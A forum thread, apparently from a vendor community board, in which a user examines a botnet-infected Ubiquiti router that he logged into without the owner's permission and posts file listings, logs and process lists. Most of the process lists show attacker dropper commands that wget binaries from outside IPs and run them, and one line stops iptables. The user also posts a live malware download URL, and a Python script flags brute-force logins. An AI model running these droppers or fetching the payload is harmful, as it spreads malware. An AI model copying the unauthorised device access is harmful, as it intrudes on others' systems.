Attack Malware


  • W

    I've been doing some research on Chinese attack nodes after my home server came under attack a couple of weeks ago.  Using Fail2Ban, I've collected a lot of attack node IP addresses.

    Some are from Ubiquiti Linux-based routers.

    At the moment, I'm examining an AirGrid M5 HP.  At some point, a self-deleting shell script was installed on it.  The script disables any firewalls it can find, then calls out to various Web sites for a copy of the real malware.

    Since I started looking at this router yesterday, it appears that an attempt was made to install a C compiler.  It's /var/tmp/cc1, and dated yesterday at about 01:30GMT.  It will not run:  I think the filesystem ran out of space before it was fully copied.

    There are a number of telltale signs in ubnt's home directory.  There are several files that have attempted to write to the persistent filesystem, but they are zero-length because the filesystem is full.

    So my questions are:

    Does this device come with a C compiler in /var/tmp?  If so, why is it dated yesterday and why does it give me a segfault if I attempt to run it?

    Should there be files in ubnt's home directory?  Specifically, a file called DDos (which also gives a segfault when it's run)?


  • W

    And now another binary file has appeared in /etc/persistent.  It's called "win9" and it filled the filesystem before finally dying.

    Does this file have any valid purpose?  Or am I seeing more evidence of malware at work?


  • Ubiquiti Employee

    What firmware was on this unit, and was remote management accessible from the Internet?


  • W

    It's firmware version XW.v5.5.6 and yes, it is open to the Internet with the default credentials still in place.

    And no, it's not mine.  I would never have done such a thing.  This is a router used to attack me.

    Technically, I shouldn't even be in it, but discerning the scale of the Chinese attack infrastructure has become something of a project.  I've found dozens of unsecured routers of various makes and models that have been infected.  This happened to be the first one I could SSH to and look at in detail.

    In any case, not being familiar with the firmware, I am unclear if the C compiler is supposed to be there in the first place.  Due to the datestamp, I suspect not, but I don't know for sure.

    I assume all the crap in ubnt's home directory is the attack malware attempting to compile binaries on the router.


  • W

    And between posts, a process filled the persistent filesystem with the binary file /etc/persistent/DDos.  I had explicitly done a "cat /dev/null > DDos" about two hours ago to see if it would fill again.  I was hoping to catch the process that created it, but I was too late.


  • W

    Also, is there anything (preferably large) that can be deleted from the persistent filesystem?  I'd like to free up enough space for the binaries to be created.  Then I can scp them out to a server under my control and examine them with a hex editor.


  • Ubiquiti Employee

    Ahh…  I see...  Well, I don't suggest accessing someone else's devices.  I would suggest contacting their ISP with IP date/time details.  That being said, the only files that should be in /etc/persistent are the following.

    XM.v5.6.1-RC.27630.150526.1108# ls -al /etc/persistent/
    drwxr-xr-x    2 ubnt     admin         100 Jan  1  1970 .
    drwxr-xr-x   10 ubnt     admin         780 May 26 11:08 ..
    lrwxrwxrwx    1 ubnt     admin          21 Jan  1  1970 cardlist.txt -> /usr/etc/cardlist.txt
    -rw-------    1 ubnt     admin         458 Oct  1  2014 dropbear_dss_host_key
    -rw-------    1 ubnt     admin         427 Oct  1  2014 dropbear_rsa_host_key
    XM.v5.6.1-RC.27630.150526.1108#
    
    
    XM.v5.6.1-RC.27630.150526.1108# ls -al /var/tmp/
    drwxr-xr-x    3 ubnt     admin         180 May 26 11:08 .
    drwxrwxrwt    7 ubnt     admin         140 Jan  1  1970 ..
    -rw-r--r--    1 ubnt     admin         696 May 26 11:08 .sessions.tdb
    -rw-r--r--    1 ubnt     admin           6 May 26 11:08 .wifi_ath0
    -rw-r--r--    1 ubnt     admin        8196 May 26 11:08 boot.txt
    -rw-------    1 ubnt     admin        5197 Jan  1  1970 running.cfg
    drwxr-xr-x    2 ubnt     admin          60 May 26 11:11 stats
    -rw-r--r--    1 ubnt     admin        5197 Jan  1  1970 system.cfg
    -rw-r--r--    1 ubnt     admin         238 May 26 11:08 ubntconf.log
    XM.v5.6.1-RC.27630.150526.1108#
    
    


  • W

    That's very interesting.  None of the files you mention are in /etc/persistent:

    XW.v5.5.6# ls -al
    drwxr-xr-x    2 ubnt     admin         160 Jun 26 18:28 .
    drwxr-xr-x   10 ubnt     admin         740 Sep  6  2013 ..
    -rwxrwxrwx    1 ubnt     admin           0 Jun 26 15:16 8187
    -rwxrwxrwx    1 ubnt     admin           0 Jun 26 19:35 DDos
    -rwxrwxrwx    1 ubnt     admin           0 Sep  6  2013 rfgsghs
    -rwxrwxrwx    1 ubnt     admin           0 Sep  5  2013 sff
    -rwxrwxrwx    1 ubnt     admin           0 Jun 26 06:59 sndddd
    -rwxrwxrwx    1 ubnt     admin           0 Jun 26 18:27 win9
    

    Also /var/tmp looks like this:

    XW.v5.5.6# ls -al /var/tmp/
    drwxr-xr-x    3 ubnt     admin         200 Jun 26 19:35 .
    drwxrwxrwt    7 ubnt     admin         140 Jan  1  1970 ..
    -rw-r--r--    1 ubnt     admin       24576 Sep  6  2013 .sessions.tdb
    -rw-r--r--    1 ubnt     admin           0 Jun 26 17:10 .update-info.json
    -rw-r--r--    1 ubnt     admin           6 Aug 30  2013 .wifi_ath0
    -rw-r--r--    1 ubnt     admin        6461 Aug 30  2013 boot.txt
    -rw-------    1 ubnt     admin        3792 Jan  1  1970 running.cfg
    -rw-r--r--    1 ubnt     admin        4096 Sep  6  2013 system.cfg
    -rw-r--r--    1 ubnt     admin         238 Aug 30  2013 ubntconf.log
    drwxr-xr-x    2 ubnt     admin          40 Sep  6  2013 upload
    

    The C compiler "cc1" was in /var/tmp, but I deleted it.  It hadn't finished copying because it had filled the filesystem, and I wanted to see what happened with those gibberish files.  I was rewarded when "DDos" filled the filesystem.

    As to contacting the ISP, I don't dare.  I have every reason to believe that they're complicit in infecting this device.  If they're not complicit, there's nothing they can do about it.

    Besides, this is a great box for forensics.  Most of the processes running on it are attack processes.  I've been able to glean a great deal about what the malware does and how it works by running some simple commands on this box.

    For various reasons, I've become interested in investigating the Chinese scan-and-attack infrastructure.  This router is part of that.


  • W

    Well, they rebooted their router, which was a grand thing from both their perspective and mine.

    On their side, it put a halt to over 90% of the attack processes running on the device.  By the time I got back into it after a couple of days, it had already downloaded a new attack binary – and the binary was still there.

    I quickly SCP-ed the attack binary (as well as a couple of others it had created but was not running) to servers under my control.  I then killed the attack processes, deleted the binaries and rebooted the router.

    This wasn't entirely because I'm a nice guy.  The device had successfully picked up new malware between the time it was rebooted and today.

    Now I want to see if -- after all traces of the malware that I know about have been removed -- it picks up the malware again.


  • W

    Aaaaaand …

    During my last post, minutes after the router was rebooted "clean," it picked up more malware.  Amazing.


  • W

    I used AVG's online decompiler (https://retdec.com) and got C code.  Admittedly, it looks like hell and is going to take a long time to slog through.

    After all, the code is 262,901 lines long and contains 398 functions.

    Ok, maybe the online compiler didn't do a great job.  But still, I have code.  :)


  • W

    Checked this morning, and the node is at it again.

    Want some fun?  Download this:

    wget -c http://117.21.191.197:2452/cdretsr

    It's currently active (I downloaded it moments ago) and will give you the ARM malware currently running on this router.

    Just for kicks, here's a process listing:

      PID USER       VSZ STAT COMMAND
        1 ubnt      1976 S    init
        2 ubnt         0 SW   [kthreadd]
        3 ubnt         0 SW   [ksoftirqd/0]
        4 ubnt         0 SW   [watchdog/0]
        5 ubnt         0 SW   [events/0]
        6 ubnt         0 SW   [khelper]
        9 ubnt         0 SW   [async/mgr]
       43 ubnt         0 SW   [sync_supers]
       45 ubnt         0 SW   [bdi-default]
       47 ubnt         0 SW   [kblockd/0]
       67 ubnt         0 SW   [khungtaskd]
       68 ubnt         0 SW   [kswapd0]
       69 ubnt         0 SW   [aio/0]
       70 ubnt         0 SW   [crypto/0]
      152 ubnt         0 SW   [mtdblockd]
      524 ubnt      1972 S    init
      679 ubnt      1964 S <  /bin/watchdog -t 1 /dev/watchdog
      791 ubnt      7208 S    /bin/infctld -m -c
      792 ubnt      1392 S    /sbin/ntpclient -n -s -c 0 -l -h time.nist.gov
      794 ubnt      2000 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
      795 ubnt      1968 S    /bin/syslogd -n -S
      796 ubnt      1500 S    /usr/bin/iwevent -s
      856 ubnt      2348 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
      919 ubnt      4660 S    ./DDos
      920 ubnt      4660 S    ./DDos
      921 ubnt      4660 S    ./DDos
     1036 ubnt      4988 S    ./win9
     1037 ubnt      4988 S    ./win9
     1038 ubnt      4988 S    ./win9
     1153 ubnt      4660 S    ./Ccc
     1154 ubnt      4660 S    ./Ccc
     1187 ubnt      4660 S    ./Ccc
     1195 ubnt      3564 S    ./Ccc
     1196 ubnt      3564 S    ./Ccc
     1217 ubnt      3564 S    ./Ccc
     1308 ubnt      2120 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
     1313 ubnt      2064 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
     1326 ubnt      1972 S    sh -c wget -c http://117.21.191.197:2452/cdretsr;chmod 777 cdretsr;./cdretsr;
     1329 ubnt      3564 S    ./cdretsr
     1330 ubnt      3564 S    ./cdretsr
     1331 ubnt      3564 S    ./cdretsr
     1339 ubnt      2064 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
     1348 ubnt      4268 S    /bin/lighttpd -D -f /etc/lighttpd.conf
     1356 ubnt      2068 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
     1357 ubnt      1976 S    -sh
     1366 ubnt      1972 R    ps w
    

    There's also a process that I observed in previous process listings that's fortunately not showing up here.  The malware had previously run commands to disable any firewall it finds.  At least we're not seeing that … yet.

    I've found another router, a peer to this one.  It shares the same make, model, and firmware revision, suffering the same issues as this one and for the same reasons:  open to the Internet for administration using the default administrator credentials.


  • W

    Here's a fun one.  I enabled logging and am getting some really useful information.

    222.186.58.177 is a potential command-and-control node.  It logged in to the router as the admin user shortly before the router started being an attack node.

    I cleaned everything out (again) and am watching the messages file closely.  In short order, 183.56.173.197 logged in and apparently SCP-ed a malware named "CQQ" to the router.

    I cleared the router (again) and am now actively monitoring the logfile.

    I'm going to have a list of potential command-and-control nodes if this keeps up …


  • W

    Caught 'em in the act.  From /var/log/messages:

    Jun 30 17:22:48 dropbear[1662]: Child connection from 222.186.30.175:4494
    Jun 30 17:22:51 dropbear[1662]: Password auth succeeded for 'ubnt' from 222.186.30.175:4494
    Jun 30 17:23:34 dropbear[1662]: Exit (ubnt): Error writing
    

    Immediately after this entry I checked the system.  Apparently 22.186.30.175 SCP-ed the file "win9" into ubnt's home directory, then executed it.
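
    The login sequence quoted above is exactly the signal a defender wants to pull out of /var/log/messages on one of these devices: a run of failed password attempts from one source, followed by a successful password login from an address the operator never used.  The following is an added example (not code from this thread or from Ubiquiti) that parses dropbear's syslog lines, aggregates them per source IP, and flags brute-force sources and unexpected successful logins.  The sample log is constructed with RFC 5737 documentation addresses, and the "Bad password attempt" line format is dropbear's failed-password message, assumed here rather than quoted from the thread.

```python
import re
from collections import defaultdict

# Message formats dropbear writes to /var/log/messages. The "Child connection"
# and "Password auth succeeded" forms are the ones quoted in the thread; the
# "Bad password attempt" form is dropbear's failed-password message (assumed).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) dropbear\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
CONNECT_RE = re.compile(r"Child connection from (?P<ip>[\d.]+):\d+")
FAIL_RE = re.compile(r"Bad password attempt for '(?P<user>[^']+)' from (?P<ip>[\d.]+):\d+")
SUCCESS_RE = re.compile(r"Password auth succeeded for '(?P<user>[^']+)' from (?P<ip>[\d.]+):\d+")

# Constructed sample log (documentation addresses, not real sources): one
# source hammering the 'ubnt' account, one login from the operator's own
# address, and one successful login from an address nobody recognises.
SAMPLE_LOG = """\
Jun 30 17:10:02 dropbear[1601]: Child connection from 198.51.100.7:52110
Jun 30 17:10:03 dropbear[1601]: Bad password attempt for 'ubnt' from 198.51.100.7:52110
Jun 30 17:10:04 dropbear[1601]: Bad password attempt for 'ubnt' from 198.51.100.7:52110
Jun 30 17:10:05 dropbear[1601]: Bad password attempt for 'ubnt' from 198.51.100.7:52110
Jun 30 17:10:06 dropbear[1601]: Bad password attempt for 'ubnt' from 198.51.100.7:52110
Jun 30 17:10:07 dropbear[1601]: Bad password attempt for 'ubnt' from 198.51.100.7:52110
Jun 30 17:15:30 dropbear[1633]: Child connection from 192.0.2.10:51000
Jun 30 17:15:33 dropbear[1633]: Password auth succeeded for 'ubnt' from 192.0.2.10:51000
Jun 30 17:22:48 dropbear[1662]: Child connection from 203.0.113.9:4494
Jun 30 17:22:51 dropbear[1662]: Password auth succeeded for 'ubnt' from 203.0.113.9:4494
Jun 30 17:23:34 dropbear[1662]: Exit (ubnt): Error writing
"""


def new_entry():
    return {"connections": 0, "failed": 0, "succeeded": [], "first": None, "last": None}


def parse_dropbear(lines):
    """Aggregate dropbear connection/auth events per source IP."""
    stats = defaultdict(new_entry)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a dropbear line (kernel, ntpclient, ...)
        ts, msg = m.group("ts"), m.group("msg")
        for rx, kind in ((CONNECT_RE, "connections"), (FAIL_RE, "failed"), (SUCCESS_RE, "succeeded")):
            hit = rx.match(msg)
            if not hit:
                continue
            entry = stats[hit.group("ip")]
            if kind == "succeeded":
                entry["succeeded"].append(hit.group("user"))
            else:
                entry[kind] += 1
            entry["first"] = entry["first"] or ts
            entry["last"] = ts
            break
    return dict(stats)


def triage(stats, allowed_ips=(), fail_threshold=5):
    """Flag brute-force sources and successful logins from unexpected addresses.

    On a device exposed with default credentials, the unexpected successful
    login is the event that matters: it is the moment a file like "win9"
    lands in the home directory and gets executed.
    """
    findings = []
    for ip, entry in sorted(stats.items()):
        if entry["failed"] >= fail_threshold:
            findings.append(("brute-force", ip, entry["failed"]))
        if entry["succeeded"] and ip not in allowed_ips:
            findings.append(("unexpected-login", ip, entry["succeeded"]))
    return findings


if __name__ == "__main__":
    stats = parse_dropbear(SAMPLE_LOG.splitlines())
    for kind, ip, detail in triage(stats, allowed_ips=("192.0.2.10",)):
        print(f"{kind:17} {ip:16} {detail}")
```

    Feed it the real file with `parse_dropbear(open("/var/log/messages"))` and put your own management addresses in `allowed_ips`; anything else that authenticates successfully is a compromise, not a false positive.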


  • W

    Well, the last interesting thing about this, inasmuch as I've now gathered enough forensic data to draw conclusions:

    Even though it's been successfully compromised, when logging is enabled, /var/log/messages fills up with numerous IP addresses attempting to brute-force the password.

    I'm going to let this device alone for a while to watch everything it does – particularly if it keeps getting hammered by brute-force attempts.

    However, preliminarily, I think I can say this:

    Attack nodes attack each other.

    This would be consistent with my theory that once open ports are found, they're thrown into a database and assigned a target value.  Apparently what's not happening is that successfully-compromised devices aren't marked as being unnecessary to attack -- or at least their target value should be lowered to where it won't get hammered like this.

    As I say, I'm going to keep an eye on this.  Now that I know how the routers are compromised, I'm going to sit back and watch what happens.


  • W

    I discovered what I've stumbled into:  the Dyre banking trojan:

    "We have seen literally hundreds of wireless access points, and routers connected in relation to this botnet, usually AirOS," said Bryan Campbell, lead threat intelligence analyst at Fujitsu. "The consistency in which the botnet is communicating with compromised routers in relation to both distribution and communication leads us to believe known vulnerabilities are being exploited in the firmware which allows this to occur."

    That would be consistent with what I'm seeing.  By no means are all the attack nodes I've identified AirOS; however, I've actively monitored five (because it's simplicity itself to log in as ubnt).

    Well, I know at least one brand to stay away from:  Ubiquiti.


  • W

    Yep, as of this morning, the router is back to its usual tricks.

    XW.v5.5.10# ls -al /etc/persistent/
    drwxr-xr-x    3 ubnt     admin         160 Jul  1 11:56 .
    drwxr-xr-x   10 ubnt     admin         740 Jul  1 06:08 ..
    drwx------    2 ubnt     admin          60 Jul  1 11:56 .ssh
    -rwxrwxrwx    1 ubnt     admin      273488 Jul  1 02:58 8384
    -rwxr-xr-x    1 ubnt     admin      763528 Jul  1 05:58 Ctvgn
    -rwxr-xr-x    1 ubnt     admin      763528 Jul  1 02:22 Ctvgt
    -rwxrwxrwx    1 ubnt     admin      763528 Jul  1 11:48 cdretsr
    -rwxrwxrwx    1 ubnt     admin      273488 Jul  1 01:09 i
    

    And a process listing ...

    XW.v5.5.10# ps w
      PID USER       VSZ STAT COMMAND
        1 ubnt      1976 S    init
        2 ubnt         0 SW   [kthreadd]
        3 ubnt         0 SW   [ksoftirqd/0]
        4 ubnt         0 SW   [watchdog/0]
        5 ubnt         0 SW   [events/0]
        6 ubnt         0 SW   [khelper]
        9 ubnt         0 SW   [async/mgr]
       43 ubnt         0 SW   [sync_supers]
       45 ubnt         0 SW   [bdi-default]
       47 ubnt         0 SW   [kblockd/0]
       67 ubnt         0 SW   [khungtaskd]
       68 ubnt         0 SW   [kswapd0]
       69 ubnt         0 SW   [aio/0]
       70 ubnt         0 SW   [crypto/0]
      152 ubnt         0 SW   [mtdblockd]
      524 ubnt      1972 S    init
      679 ubnt      1964 S <  /bin/watchdog -t 1 /dev/watchdog
      791 ubnt      7208 S    /bin/infctld -m -c
      792 ubnt      1392 S    /sbin/ntpclient -n -s -c 0 -l -h time.nist.gov
      794 ubnt      2000 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
      795 ubnt      1968 S    /bin/syslogd -n -S
      796 ubnt      1500 S    /usr/bin/iwevent -s
     2537 ubnt      1972 S    sh -c wget http://222.186.58.177:8025/8384;chmod 0777 8384;./8384
     2579 ubnt      4984 S    ./8384
     2580 ubnt      4984 S    ./8384
     2723 ubnt     25400 S    ./win9
     2724 ubnt     25400 S    ./win9
     2725 ubnt     25400 S    ./win9
     2737 ubnt     25400 S    ./win9
     2738 ubnt     25400 S    ./win9
     2739 ubnt     25400 S    ./win9
     2740 ubnt     25400 S    ./win9
     2741 ubnt     25400 S    ./win9
     2742 ubnt     25400 S    ./win9
     2743 ubnt     25400 S    ./win9
     2744 ubnt     25400 S    ./win9
     2745 ubnt     25400 S    ./win9
     2746 ubnt     25400 S    ./win9
     2754 ubnt      1972 S    sh -c wget http://222.186.58.177:8025/8384;chmod 0777 8384;./8384
     2757 ubnt      4920 S    ./8384
     2758 ubnt      4920 S    ./8384
     2775 ubnt      2068 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
     2914 ubnt      1976 S    sh -c rm -f *;wget -c http://210.51.13.120:65530/i;chmod 777 i;./i
     2918 ubnt     94836 S    ./i
     2919 ubnt     94836 S    ./i
     2920 ubnt     94836 S    ./i
     2922 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
     2926 ubnt      3564 S    ./8384
     2927 ubnt      3564 S    ./8384
     2929 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
     2932 ubnt      3564 S    ./8384
     2933 ubnt      3564 S    ./8384
     2936 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
     2939 ubnt      3564 S    ./8384
     2940 ubnt      3564 S    ./8384
     2943 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
     2946 ubnt      3564 S    ./8384
     2947 ubnt      3564 S    ./8384
     2951 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
     2954 ubnt      3564 S    ./8384
     2955 ubnt      3564 S    ./8384
     2991 ubnt      1976 S    sh -c rm -f *;wget -c http://210.51.13.120:65530/i;chmod 777 i;./i
     2995 ubnt      3564 S    ./i
     2996 ubnt      3564 S    ./i
     2997 ubnt      3564 S    ./i
     3082 ubnt     94836 S    ./i
     3083 ubnt     94836 S    ./i
     3084 ubnt     94836 S    ./i
     3085 ubnt     94836 S    ./i
     3086 ubnt     94836 S    ./i
     3087 ubnt     94836 S    ./i
     3088 ubnt     94836 S    ./i
     3089 ubnt     94836 S    ./i
     3090 ubnt     94836 S    ./i
     3091 ubnt     94836 S    ./i
     3092 ubnt     94836 S    ./i
     3094 ubnt     94836 S    ./i
     3095 ubnt     94836 S    ./i
     3096 ubnt     94836 S    ./i
     3099 ubnt     94836 S    ./i
     3100 ubnt     94836 S    ./i
     3101 ubnt     94836 S    ./i
     3102 ubnt     94836 S    ./i
     3103 ubnt     94836 S    ./i
     3104 ubnt     94836 S    ./i
     3105 ubnt     94836 S    ./i
     3106 ubnt     94836 S    ./i
     3107 ubnt     94836 S    ./i
     3108 ubnt     94836 S    ./i
     3109 ubnt     94836 S    ./i
     3110 ubnt     94836 S    ./i
     3111 ubnt     94836 S    ./i
     3112 ubnt     94836 S    ./i
     3113 ubnt     94836 S    ./i
     3124 ubnt     94836 S    ./i
     3125 ubnt     94836 S    ./i
     3126 ubnt     94836 S    ./i
     3127 ubnt     94836 S    ./i
     3128 ubnt     94836 S    ./i
     3129 ubnt     94836 S    ./i
     3130 ubnt     94836 S    ./i
     3131 ubnt     94836 S    ./i
     3132 ubnt     94836 S    ./i
     3133 ubnt     94836 S    ./i
     3134 ubnt     94836 S    ./i
     3135 ubnt     94836 S    ./i
     3136 ubnt     94836 S    ./i
     3137 ubnt     94836 S    ./i
     3138 ubnt     94836 S    ./i
     3188 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
     3191 ubnt      3564 S    ./8384
     3192 ubnt      3564 S    ./8384
     3204 ubnt      1716 S    ./Ctvgt
     3205 ubnt      1716 S    ./Ctvgt
     3382 ubnt      1772 S    ./Ctvgt
     3383 ubnt      1772 S    ./Ctvgt
     3838 ubnt      1772 S    ./Ctvgn
     3839 ubnt      1772 S    ./Ctvgn
     8099 ubnt      2164 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
    10781 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    10785 ubnt      3564 S    ./8384
    10786 ubnt      3564 S    ./8384
    10818 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    10821 ubnt      3564 S    ./8384
    10822 ubnt      3564 S    ./8384
    10829 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    10831 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    10835 ubnt      3564 S    ./8384
    10836 ubnt      3564 S    ./8384
    10840 ubnt      3564 S    ./8384
    10841 ubnt      3564 S    ./8384
    10863 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    10866 ubnt      3564 S    ./8384
    10867 ubnt      3564 S    ./8384
    11259 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11263 ubnt      3564 S    ./8384
    11264 ubnt      3564 S    ./8384
    11269 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11272 ubnt      3564 S    ./8384
    11273 ubnt      3564 S    ./8384
    11279 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11282 ubnt      3564 S    ./8384
    11283 ubnt      3564 S    ./8384
    11288 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11291 ubnt      3564 S    ./8384
    11293 ubnt      3564 S    ./8384
    11298 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11302 ubnt      3564 S    ./8384
    11303 ubnt      3564 S    ./8384
    11356 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11360 ubnt      3564 S    ./8384
    11361 ubnt      3564 S    ./8384
    11391 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11394 ubnt      3564 S    ./8384
    11395 ubnt      3564 S    ./8384
    11614 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11617 ubnt      3564 S    ./8384
    11618 ubnt      3564 S    ./8384
    11760 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    11763 ubnt      3564 S    ./8384
    11764 ubnt      3564 S    ./8384
    12142 ubnt      1972 S    sh -c /etc/init.d/iptables stop;service iptables stop;Swget http://222.186.58.177:8026/8384;chmod 0777 838
    12145 ubnt      3564 S    ./8384
    12146 ubnt      3564 S    ./8384
    12256 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12260 ubnt      3564 S    ./8384
    12261 ubnt      3564 S    ./8384
    12335 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12339 ubnt      3564 S    ./8384
    12340 ubnt      3564 S    ./8384
    12374 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12378 ubnt      3564 S    ./8384
    12379 ubnt      3564 S    ./8384
    12488 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12491 ubnt      3564 S    ./8384
    12492 ubnt      3564 S    ./8384
    12501 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12504 ubnt      3564 S    ./8384
    12505 ubnt      3564 S    ./8384
    12569 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12572 ubnt      3564 S    ./8384
    12573 ubnt      3564 S    ./8384
    12739 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12744 ubnt      3564 S    ./8384
    12745 ubnt      3564 S    ./8384
    12813 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    12817 ubnt      3564 S    ./8384
    12818 ubnt      3564 S    ./8384
    12917 ubnt      4268 S    /bin/lighttpd -D -f /etc/lighttpd.conf
    12934 ubnt      2064 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
    13115 ubnt      4984 S    ./8384
    13116 ubnt      3564 S    ./8384
    13117 ubnt      3564 S    ./8384
    13118 ubnt      3564 S    ./8384
    13119 ubnt      3564 S    ./8384
    13120 ubnt      3564 S    ./8384
    13121 ubnt      3564 S    ./8384
    13122 ubnt      4920 S    ./8384
    13123 ubnt      3564 S    ./8384
    13124 ubnt      3564 S    ./8384
    13125 ubnt      3564 S    ./8384
    13126 ubnt      3564 S    ./8384
    13127 ubnt      3564 S    ./8384
    13128 ubnt      3564 S    ./8384
    13129 ubnt      3564 S    ./8384
    13130 ubnt      3564 S    ./8384
    13131 ubnt      3564 S    ./8384
    13132 ubnt      3564 S    ./8384
    13133 ubnt      3564 S    ./8384
    13134 ubnt      3564 S    ./8384
    13135 ubnt      3564 S    ./8384
    13136 ubnt      3564 S    ./8384
    13137 ubnt      3564 S    ./8384
    13138 ubnt      3564 S    ./8384
    13139 ubnt      3564 S    ./8384
    13140 ubnt      3564 S    ./8384
    13141 ubnt      3564 S    ./8384
    13142 ubnt      3564 S    ./8384
    13143 ubnt      3564 S    ./8384
    13144 ubnt      3564 S    ./8384
    13202 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    13205 ubnt      3564 S    ./8384
    13206 ubnt      3564 S    ./8384
    13207 ubnt      3564 S    ./8384
    13452 ubnt      1972 S    sh -c wget http://222.186.58.177:8026/8384;chmod 0777 8384;./8384
    13456 ubnt      3564 S    ./8384
    13457 ubnt      3564 S    ./8384
    13458 ubnt      3564 S    ./8384
    14266 ubnt      1972 S    sh -c wget http://222.186.58.177:8027/8384;chmod 0777 8384;./8384
    14269 ubnt      3564 S    ./8384
    14270 ubnt      3564 S    ./8384
    14271 ubnt      3564 S    ./8384
    14383 ubnt      1972 S    sh -c wget http://222.186.58.177:8027/8384;chmod 0777 8384;./8384
    14386 ubnt      3564 S    ./8384
    14387 ubnt      3564 S    ./8384
    14388 ubnt      3564 S    ./8384
    14409 ubnt      1972 S    sh -c wget http://222.186.58.177:8027/8384;chmod 0777 8384;./8384
    14412 ubnt      3564 S    ./8384
    14413 ubnt      3564 S    ./8384
    14414 ubnt      3564 S    ./8384
    14884 ubnt      1972 S    sh -c wget -c http://117.21.191.197:2452/cdretsr;chmod 777 cdretsr;./cdretsr;
    14910 ubnt      3564 S    ./cdretsr
    14911 ubnt      3564 S    ./cdretsr
    14912 ubnt      3564 S    ./cdretsr
    15160 ubnt      2068 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
    15166 ubnt      1984 S    -sh
    15223 ubnt      2044 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
    15227 ubnt      3564 S    ./8384
    15246 ubnt      2044 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
    15350 ubnt      2068 S    /bin/dropbear -F -d /etc/persistent/dropbear_dss_host_key -r /etc/persistent/dropbear_rsa_host_key -p 22
    15355 ubnt      1976 S    -sh
    15358 ubnt      1972 R    ps w
    

    Finally, snapshot of 'top':

    Mem: 58492K used, 3632K free, 0K shrd, 764K buff, 6588K cached
    CPU:   0% usr   2% sys   0% nice  92% idle   0% io   0% irq   4% softirq
    Load average: 0.03 0.06 0.01
      PID  PPID USER     STAT   VSZ %MEM %CPU COMMAND
    15472 15355 ubnt     R     1992   3%   1% top
     2746  2724 ubnt     S    25400  41%   0% ./win9
     2742  2724 ubnt     S    25400  41%   0% ./win9
     2739  2724 ubnt     S    25400  41%   0% ./win9
     2744  2724 ubnt     S    25400  41%   0% ./win9
     2745  2724 ubnt     S    25400  41%   0% ./win9
     2738  2724 ubnt     S    25400  41%   0% ./win9
     2743  2724 ubnt     S    25400  41%   0% ./win9
